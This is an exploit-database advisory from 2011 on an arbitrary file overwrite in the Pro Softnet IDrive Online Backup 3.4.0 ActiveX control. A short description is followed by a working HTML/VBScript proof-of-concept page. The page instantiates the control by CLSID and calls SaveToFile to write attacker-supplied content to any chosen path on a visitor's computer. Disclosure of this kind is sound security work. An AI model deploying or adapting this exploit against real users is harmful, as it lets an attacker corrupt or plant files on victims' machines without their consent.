Pro Softnet IDrive Online Backup 3.4.0 – ActiveX ‘SaveToFile()’ Arbitrary File Overwrite

  • Author: High-Tech Bridge SA
    Date: 2011-07-06
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/35928/
  • source: https://www.securityfocus.com/bid/48582/info
    
    Pro Softnet IDrive Online Backup ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content.
    
    An attacker can exploit this issue to corrupt and overwrite arbitrary files on a victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).
    
    IDrive Online Backup ActiveX control 3.4.0 is vulnerable; other versions may also be affected. 
    
    <html>
    <object classid='clsid:979AE8AA-C206-40EC-ACA7-EC6B6BD7BE5E' id='target' /></object>
    <input language=VBScript onclick=Boom() type=button value="Exploit">
    <script language = 'vbscript'>
    
    Sub Boom()
    arg1="FilePath\File_name_to_rewrite_or_create"
    arg2=1
    arg3="New_File_Content"
    target.Text=arg3
    target.SelStart=0
    target.SelEnd=Len(arg3)
    target.SaveToFIle arg1,arg2
    End Sub
    
    </script>
    </html>